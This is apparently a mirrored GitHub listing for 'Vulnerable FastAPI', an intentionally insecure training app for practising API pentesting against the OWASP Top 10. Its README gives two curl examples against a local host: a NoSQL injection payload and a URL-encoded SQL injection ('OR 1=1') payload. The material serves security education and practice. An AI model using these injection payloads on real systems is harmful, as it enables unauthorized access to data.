Giters

julioarruda / vfapi

Vulnerable FastAPI in reference to Opensource Web Application Security Project (OWASP) TOP 10: 2021

Home Page:https://git.io/vulnfapi

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Vulnerable FastAPI Logo

Vulnerable FastAPI, compliant to OWASP TOP 10: 2021
⚠️ Under Development ⚠️

Vulnerable FastAPI is a simple vulnerable FastAPI application for learning API pentesting on vulnerable API endpoints. Please refer to /docs for information regarding endpoints.

Current exploitation examples

$ export HOST="127.0.0.1"; export PORT=8888

NoSQLi

$ curl -s "http://$HOST:$PORT/find" -H 'Content-Type: application/json' -d '{"id":{"$in":[1,2]}}' | jq

SQLi

$ curl -s "http://$HOST:$PORT/select?username=%22%20OR%201%3D1%3B%20--%20" | jq

Thanks

About

Vulnerable FastAPI in reference to Opensource Web Application Security Project (OWASP) TOP 10: 2021

https://git.io/vulnfapi

License:MIT License

Languages

Language:Python 72.4%Language:Shell 9.3%Language:HTML 6.9%Language:CSS 6.7%Language:Svelte 3.3%Language:JavaScript 1.5%